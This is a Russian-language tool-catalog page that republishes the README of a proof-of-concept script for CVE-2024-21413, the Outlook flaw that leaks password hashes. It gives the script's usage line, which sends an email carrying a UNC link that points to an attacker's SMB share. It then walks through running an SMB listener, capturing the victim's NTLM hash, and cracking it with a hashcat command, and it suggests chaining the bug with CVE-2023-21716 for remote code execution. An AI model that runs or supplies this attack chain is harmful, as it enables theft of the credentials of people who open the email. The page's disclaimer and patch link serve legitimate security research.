Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-21413 — Уязвимость раскрытия информации Microsoft Outlook (утечка хэша пароля) - Expect Script POC | Kitploit
Инструменты/GitHubGitHub/duy-31/cve-2024-21413
Взлом паролейИнструменты фишингаАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеБезопасность Электронной Почты
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Уязвимость раскрытия информации Microsoft Outlook (утечка хэша пароля) - Expect Script POC

Репозиторий
1573352 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-21413 - Expect Script POC

Уязвимость утечки учетных данных и удаленного выполнения кода в Microsoft Outlook при связке с CVE-2023-21716 (через панель предварительного просмотра) CVSS:3.1 9.8 / 8.5

Outlook должен предупреждать о риске при открытии внешней ссылки, но этого не происходит!

image

использование: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

примечания: chmod +x cve-2024-21413.sh

требуется приложение expect и требуется легитимный IP-отправитель и адрес отправителя (чтобы пройти SPF, DKIM, DMARC)


  • Сначала запустите слушатель SMB, например так

image

  • запустите POC

image

  • и дождитесь письма, затем в окне предварительного просмотра нажмите на ссылку

image

  • затем вы должны получить логин и хэш пользователя, который нажал на ссылку (без предупреждающего сообщения в уязвимых версиях Outlook)

    image

  • Затем вы можете попытаться взломать пароль с помощью hashcat. Просто скопируйте всю строку с именем пользователя в файл и запустите hashcat с модулем 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Вы можете объединить эту CVE с CVE-2023-21716 для получения RCE!!!

Благодарности: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Обходное решение/Исправление: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставляется ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в какой-либо системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям является незаконным, и пользователи, уличенные в несанкционированных действиях, подлежат юридической ответственности. Автор НЕ несет ответственности за любой ущерб, вызванный неправильным использованием этого скрипта.

Скачать инструмент